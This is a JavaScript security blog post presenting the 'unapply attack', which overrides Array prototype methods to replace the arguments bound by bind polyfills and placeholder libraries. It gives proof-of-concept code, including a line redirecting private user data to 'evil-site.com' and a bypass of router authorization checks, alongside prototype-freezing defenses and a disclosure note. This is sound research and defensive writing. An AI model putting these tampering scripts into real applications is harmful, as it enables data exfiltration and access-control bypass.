May 27 2015

Unapply attack

Compromise functions private to closures via partially applied references.

TL;DR We can exploit partially applied functions to "free" the bound arguments and run the original function with a new set of unexpected runtime arguments. This is a potentially serious security hole, as it can affect various browsers and popular server middleware projects like Express.js. It effectively removes the assumption that functions inside closures are private to the closure and cannot be accessed from the outside.

Review

The exploit uses two basic JavaScript concepts: closures and partial application.

Closures

You can review closures by reading this blog post. In essence, JavaScript does not have the keyword private. Instead, it restricts a variable's visibility to the function that declares it. This is commonly used to create variables that cannot be accessed from the outside:

var four = (function closure() {
  var two = 2; // private to "closure"
  return 4;
}());
four; // 4
two; 
// ReferenceError: two is not defined

Partial application review

You can review the JavaScript concepts of context binding and partial application by reading this blog post.

JavaScript ES5 includes a native method for binding values to a function's arguments and producing a new function. For example:

function add(a, b) { return a + b; }
var add2 = add.bind(null, 2);
var add2to5 = add.bind(null, 2, 5);
add2(10); // 12
add2to5(); // 7

We assume that given only a partially applied function reference, like add2 or add2to5, there is no way to get to the original function reference add. This can be used to conveniently hide the original unprotected code inside a closure, exporting only a partially applied function that is safe for the outside users to call.

Here is an example of a closure with an unprotected function and an exported partially bound reference.

// take a simple function add, 
// make it private to a closure
// and return partially applied version
var add2 = (function() {
    function add(a, b) {
        if (a === 42) {
            throw new Error('Oh no, first argument is 42!');
        }
        return a + b;
    }
    return add.bind(null, 2);
}());
// one can safely use add2
console.log(add2(3)); // 5

Because add is inside the anonymous closure, we assume there is no way to call it from the outside, except via the returned partially applied reference. This matters here because add has an undesired behavior: it crashes if the first argument has the value 42. The programmer assumes that add will always run with the first argument equal to 2. Yet this assumption is invalid, as I will show next.

Polyfills

The native Function.prototype.bind method used above is part of the modern ES5 standard. There are a lot of polyfills that provide this method for legacy reasons. One can easily write a bind polyfill. Here is one suggestion that does not implement the context binding, only the partial argument application.

// simple bind polyfill
function bind(fn) {
  var prev = Array.prototype.slice.call(arguments, 1);
  return function bound() {
    var curr = Array.prototype.slice.call(arguments, 0);
    var args = Array.prototype.concat.apply(prev, curr);
    return fn.apply(null, args);
  };
}

The main principle is to combine the values given in the original call (the prev array) with the values given at the later runtime call (the curr array). One can use the custom bind similarly to the native one:

var add2 = bind(add, 2);
add2(3); // 5

A typical polyfill used in many projects is es5-shim, downloaded more than 100k times every month. The es5-shim library has its own bind function. Its argument combination code is very similar to the simple "bind" code example from above:

// other stuff
return target.apply(
  that,
  args.concat(array_slice.call(arguments))
);

Attacking polyfills

The goal of the attack is to run the original function instance, replacing the previously bound arguments with the new runtime values. Because the original function might rely on its privacy, it might NOT validate the inputs, assuming that some of them will always be bound to the "safe" values.

Here is how one can achieve this. Let us take a look at the simple bind polyfill again. Suppose we inspect the source of the bound function add2. We will see just the code returned by the polyfill.

var add2 = bind(add, 2);
console.log(add2.toString());
/*
function bound() {
  var curr = Array.prototype.slice.call(arguments, 0);
  var args = Array.prototype.concat.apply(prev, curr);
  return fn.apply(null, args);
}
*/

Typically, I would attack a method like this by faking its lexical scope, but this function accesses two variables via the lexical scope: prev and fn. Since I want to use the original fn function while replacing prev, this technique does not work.

Yet, there is a part of the code that I can modify easily: the Array.prototype.concat call that combines the previously bound values prev with the runtime values curr. I (the attacker) can simply overwrite the Array.prototype.concat method to discard the prev array entirely! Here is one attack method that works against both the simple bind and es5-shim functions:

// unapply-attack
function unapplyAttack() {
  var concat = Array.prototype.concat;
  Array.prototype.concat = function replaceAll() {
    Array.prototype.concat = concat; // restore the correct version
    var curr = Array.prototype.slice.call(arguments, 0);
    var result = concat.apply([], curr);
    return result;
  };
}

An attacker uses the above unapplyAttack function like this:

// attack example
var add2 = (function () {
  function add(a, b) {
    if (a === 42) {
      throw new Error('Oh no, first argument is 42!');
    }
    return a + b;
  }
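  // bind here must be a polyfilled version (the simple bind or es5-shim);
  // a native Function.prototype.bind does not call Array.prototype.concat
  return add.bind(null, 2);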
}());
console.log(add2(3)); // 5
unapplyAttack();
add2(42, 10);
// ERROR!

Again, just to stress the important point: the attack does not rely on calling toString(), only on inspecting the bind implementation and changing the Array.prototype method(s) to alter the behavior when combining previously bound values with the new ones.
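The pieces above can be put together into one self-contained script. This is a sketch that reuses the simple bind polyfill and the unapplyAttack function from this post, with the closure exporting a polyfill-bound function rather than a natively bound one; the variables before, caught and after are added here only to record the results.

```javascript
// Simple bind polyfill from this post (partial application only).
function bind(fn) {
  var prev = Array.prototype.slice.call(arguments, 1);
  return function bound() {
    var curr = Array.prototype.slice.call(arguments, 0);
    var args = Array.prototype.concat.apply(prev, curr);
    return fn.apply(null, args);
  };
}

// One-shot attack: the next concat call ignores its receiver (the bound values).
function unapplyAttack() {
  var concat = Array.prototype.concat;
  Array.prototype.concat = function replaceAll() {
    Array.prototype.concat = concat; // restore the original right away
    return concat.apply([], Array.prototype.slice.call(arguments, 0));
  };
}

var add2 = (function () {
  function add(a, b) {
    if (a === 42) {
      throw new Error('Oh no, first argument is 42!');
    }
    return a + b;
  }
  return bind(add, 2); // the polyfill, not the native Function.prototype.bind
}());

var before = add2(3); // add(2, 3)

unapplyAttack();
var caught = null;
try {
  add2(42, 10); // runs add(42, 10) because the bound 2 was discarded
} catch (err) {
  caught = err.message;
}

var after = add2(3); // normal again: the attack restored concat itself
console.log(before, caught, after);
```

Because the replacement restores the original concat on its first call, the attack leaves no trace once it has fired, which makes it hard to notice after the fact.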

Another attack example

Suppose we send the user's data to the server:

var sendUserData = (function () {
  var serverUrl = 'https://...'; // injected by the server
  return $http.post.bind($http, serverUrl, privateUserData);
}());
// expected behavior
sendUserData();
// attack behavior - only change first bound value
unapplyAttack();
sendUserData('http://evil-site.com');
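The unapplyAttack shown earlier discards every bound value, so redirecting the data while keeping the bound payload needs a small variation. Below is a sketch of such a variant against the simple bind polyfill only. The post function, the placeholder URL, the sample data and the name replaceLeadingAttack are all hypothetical stand-ins invented for this illustration; post just records what it was asked to send.

```javascript
// Hypothetical stand-in for an HTTP client: it only records its calls.
var sent = [];
function post(url, data) {
  sent.push({ url: url, data: data });
}

// Simple bind polyfill from this post.
function bind(fn) {
  var prev = Array.prototype.slice.call(arguments, 1);
  return function bound() {
    var curr = Array.prototype.slice.call(arguments, 0);
    var args = Array.prototype.concat.apply(prev, curr);
    return fn.apply(null, args);
  };
}

var sendUserData = (function () {
  var serverUrl = 'https://example.com/api'; // placeholder URL (assumption)
  var privateUserData = { name: 'alice' };   // placeholder data (assumption)
  return bind(post, serverUrl, privateUserData);
}());

// Variant attack: overwrite only the leading bound values, keep the rest.
function replaceLeadingAttack() {
  var concat = Array.prototype.concat;
  Array.prototype.concat = function replaceLeading() {
    Array.prototype.concat = concat; // restore the original right away
    var curr = Array.prototype.slice.call(arguments, 0);
    // `this` is the array of bound values; keep those the attacker did not override
    var kept = Array.prototype.slice.call(this, curr.length);
    return concat.call(curr, kept);
  };
}

sendUserData(); // expected behavior: posts to the real server

replaceLeadingAttack();
sendUserData('http://evil-site.com'); // same private data, attacker's URL

console.log(sent);
```

The variant depends on the exact shape of the concat call inside the polyfill, so a different implementation (es5-shim, for example) would need its own adjustment.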

One can attack even the modern ES5 engines in 3 steps:

1. delete the native Function.prototype.bind
2. load the es5-shim (which many projects do for legacy reasons)
3. execute the unapplyAttack

// replace v8's native bind with es5-shim version
delete Function.prototype.bind;
require('es5-shim');
var unapplyAttack = require('./unapply-attack');
// execute the attack whenever possible
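The reason the native bind has to be deleted first is that a natively bound function keeps its bound arguments inside the engine and should never call Array.prototype.concat. The sketch below illustrates this under that assumption; originalConcat, result and patchStillArmed are names added for this example, and the script cleans up the patched method at the end because the one-shot replacement never fires.

```javascript
function add(a, b) {
  return a + b;
}
var add2 = add.bind(null, 2); // native Function.prototype.bind

var originalConcat = Array.prototype.concat;

// Same attack as in this post.
function unapplyAttack() {
  var concat = Array.prototype.concat;
  Array.prototype.concat = function replaceAll() {
    Array.prototype.concat = concat; // restore the correct version
    var curr = Array.prototype.slice.call(arguments, 0);
    return concat.apply([], curr);
  };
}

unapplyAttack();
var result = add2(42, 10); // still add(2, 42): the bound 2 stays in place

// The native bound function never called concat, so the patch is still installed.
var patchStillArmed = Array.prototype.concat !== originalConcat;
Array.prototype.concat = originalConcat; // clean up manually

console.log(result, patchStillArmed);
```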

Attacking Express.js

The middleware stacks in Express.js can be attacked if the programmers used partial application to remove the routing boilerplate. Typically, there is a router that executes the middleware functions in order, unless a function returns false. For example, let us have a "server" that only allows the restricted functions to run if the user is logged in and authorized. You can see the "server" code in server.js.

The partial application used in this example is a simple placeholder binder, spots, similar to the now common functions in popular libraries, like lodash#partial and Ramda#partial.

// exporting partially applied authorization routing function
var route = (function protectServer() {
  ...
  function isLoggedIn() { ... }
  function isAuthorized() { ... }
  ...
  var S = require('spots');
  var isValidUser = S(router, S, isLoggedIn, isAuthorized);
  return isValidUser;
}());
function restricted() {
  console.log('running restricted action');
}
route('/foo', restricted); // not allowed

Unless the functions isLoggedIn and isAuthorized return true, the restricted function should never run. But this is only true if the attacker can NOT replace the bound values via the route reference. Replacing them is simple for the spots library: we can inspect the relevant source code to see how it places the runtime arguments into the placeholder items.

// part of spots.js that combines previous "bound" and current values
var combinedArgs = [];
args.forEach(function (arg) {
  if (arg === spots) {
    combinedArgs.push(moreArgs.shift());
  } else {
    combinedArgs.push(arg);
  }
});

Here is the attack:

function unapplyAttack() {
  var S = require('spots');
  var forEach = Array.prototype.forEach;
  Array.prototype.forEach = function sendSpots(cb) {
    var k;
    for (k = 0; k < this.length; k += 1) {
      cb(S, k, this);
    }
    Array.prototype.forEach = forEach; // restore correct version
  };
}
unapplyAttack();
function allow() {
  return true;
}
route('/foo', allow, allow, restricted); 
// this replaces all previous values by faking the spots comparison
// running restricted action
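To try the placeholder attack without the real server, here is a self-contained sketch. The spots function below is a minimal stand-in modeled on the snippet quoted above, not the actual spots source, and router, isLoggedIn, isAuthorized and the 'denied' return value are hypothetical simplifications made up for this example.

```javascript
// Minimal stand-in for a placeholder binder (NOT the real spots source).
function spots(fn) {
  var args = Array.prototype.slice.call(arguments, 1);
  return function bound() {
    var moreArgs = Array.prototype.slice.call(arguments, 0);
    var combinedArgs = [];
    args.forEach(function (arg) {
      if (arg === spots) {
        combinedArgs.push(moreArgs.shift()); // fill a placeholder
      } else {
        combinedArgs.push(arg);              // keep a bound value
      }
    });
    return fn.apply(null, combinedArgs.concat(moreArgs));
  };
}

// Hypothetical router: runs the action only if both checks pass.
function router(url, isLoggedIn, isAuthorized, action) {
  if (isLoggedIn() && isAuthorized()) {
    return action();
  }
  return 'denied';
}

var route = (function protectServer() {
  function isLoggedIn() { return false; }
  function isAuthorized() { return false; }
  return spots(router, spots, isLoggedIn, isAuthorized);
}());

function restricted() { return 'running restricted action'; }
function allow() { return true; }

var normal = route('/foo', restricted); // the private checks reject the call

// Attack from this post: every bound value is reported as a placeholder.
function unapplyAttack() {
  var forEach = Array.prototype.forEach;
  Array.prototype.forEach = function sendSpots(cb) {
    for (var k = 0; k < this.length; k += 1) {
      cb(spots, k, this);
    }
    Array.prototype.forEach = forEach; // restore correct version
  };
}

unapplyAttack();
var attacked = route('/foo', allow, allow, restricted);
console.log(normal, attacked);
```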

I am not sure if such a placeholder trick is possible for the lodash library. The value combinator in that library uses plain indices to combine the arrays, without calling the prototype methods; see the wrapper code.

Preventing the unapply attacks

There are steps that both library authors and users can take to stop unapply-style attacks.

From the user's (website author) perspective I only see one solution to these attacks: freezing the built-in prototypes like Array.prototype, Function.prototype, Object.prototype before loading any other code (like trusted libraries or 3rd party code). For example:

// prevent the second attack
unapplyAttack();
console.log(add2(10, 3)); // 13
Object.freeze(Array.prototype);
unapplyAttack();
console.log(add2(10, 3)); // 12

As far as I see, unless one can show a very convincing use case, modifying the built-in prototypes should not be possible. I suggest freezing the prototypes after loading the system / shim JavaScript libraries but before loading any of the application-specific or 3rd party plugin code.
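One detail worth knowing when freezing prototypes is how a later overwrite attempt fails. The sketch below assumes it runs as a classic script or CommonJS module: in sloppy mode the assignment is silently ignored, while strict-mode code gets a TypeError. The names sloppyThrew, strictPatch, strictError, intact and joined are added here for illustration.

```javascript
var originalConcat = Array.prototype.concat;
Object.freeze(Array.prototype);

// Sloppy-mode attempt: the assignment is silently ignored.
// (If this file itself runs in strict mode it throws instead, hence the try.)
var sloppyThrew = false;
try {
  Array.prototype.concat = function fake() { return []; };
} catch (err) {
  sloppyThrew = true;
}

// Strict-mode attempt: writing to a frozen object throws a TypeError.
function strictPatch() {
  'use strict';
  Array.prototype.concat = function fake() { return []; };
}
var strictError = null;
try {
  strictPatch();
} catch (err) {
  strictError = err;
}

// Either way the original method is still in place and still works.
var intact = Array.prototype.concat === originalConcat;
var joined = [1].concat([2]);
console.log(intact, joined, strictError instanceof TypeError);
```

The loud failure in strict mode is a useful side effect: 3rd party code that tries to patch a frozen prototype tends to reveal itself right away.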

The library authors can take steps to lessen the chance of the attack in a couple of ways. One, keep a reference to the original (hopefully uncompromised) methods used to combine arguments.

// inside the shim library
var concat = Array.prototype.concat;
function bind(fn) {
  ...
  // use the original / non-compromised concat
  var args = concat.apply(prev, curr);
  return fn.apply(null, args);
}
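A filled-in version of this idea might look like the sketch below. It is not the es5-shim code; safeBind, originalConcat and result are names made up for this example. The library captures slice and concat once, at load time, and the attack from this post then has nothing to hook into.

```javascript
var safeBind = (function () {
  // Captured at load time, before any untrusted code had a chance to run.
  var slice = Array.prototype.slice;
  var concat = Array.prototype.concat;
  return function bind(fn) {
    var prev = slice.call(arguments, 1);
    return function bound() {
      var curr = slice.call(arguments, 0);
      // uses the captured concat, not whatever Array.prototype holds now
      return fn.apply(null, concat.apply(prev, curr));
    };
  };
}());

function add(a, b) {
  if (a === 42) {
    throw new Error('Oh no, first argument is 42!');
  }
  return a + b;
}
var add2 = safeBind(add, 2);

var originalConcat = Array.prototype.concat;

// Same attack as in this post.
function unapplyAttack() {
  var concat = Array.prototype.concat;
  Array.prototype.concat = function replaceAll() {
    Array.prototype.concat = concat; // restore the correct version
    var curr = Array.prototype.slice.call(arguments, 0);
    return concat.apply([], curr);
  };
}

unapplyAttack();
var result = add2(42, 10); // add(2, 42): the bound 2 survives, no error
Array.prototype.concat = originalConcat; // the one-shot patch never fired

console.log(result);
```

This still relies on Function.prototype.call and Function.prototype.apply, which could be replaced as well, so it lessens the chance of the attack rather than ruling it out.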

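Second, instead of using methods to combine previously bound / runtime arguments, use plain for loops, which would be harder to change externally:

// inside the shim library
function bind(fn) {
  var prev = [], i;
  for (i = 1; i < arguments.length; i += 1) {
    prev[i - 1] = arguments[i]; // copy the bound values without slice
  }
  return function bound() {
    var args = [], k; // fresh array on every call, prev is never mutated
    for (k = 0; k < prev.length; k += 1) { args[k] = prev[k]; }
    for (k = 0; k < arguments.length; k += 1) {
      args[prev.length + k] = arguments[k];
    }
    return fn.apply(null, args);
  };
}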

Conclusion

JavaScript is a wonderful and flexible language, but some malicious code can use the language's prototype methods to break the expectation of "privacy" inside the closures. It will take more than just relying on the original Function.prototype.bind in all cases; modern applications use other styles of partial application using client-space implementations: partial application from the right, position index application, application with placeholders and application by name. It is up to the library's authors to provide reasonably safe implementations, and up to the user to be vigilant against loading malicious code.

Finally, I guess this attack can be extended to rebinding the original function to a different context.

Update 1

After I contacted the es5-shim maintainers, the bind polyfill was made more robust against tampering with the Array.prototype.concat method; see the change.

Update 2

I wrote a small library to freeze the common prototypes before loading untrusted 3rd party code. I hope that this is enough to prevent these attacks.

index.html

<script src="//cdn/jquery.js"></script>
<script src="//cdn/angular.js"></script>
<script src="dist/freeze-prototypes.js"></script>
<script src="<your app code>"></script>
<script src="<untrusted 3rd party code>"></script>

See freeze-prototypes

Update 3

A lot of the feedback I have received for this blog post focuses, in my opinion, on the wrong aspect. Yes, the attacker would need to run malicious code. Yes, JavaScript is a dynamic language. But the problem is that by using unreviewed 3rd party code, we trust that code too much. In essence we are saying that if we keep the door locked, we don't need a safe inside the house. The privacy mechanism the closures give us is like a safe. By allowing 3rd party code to modify prototypes we are removing the safe's back wall!

Better world by better software

Gleb Bahmutov PhD
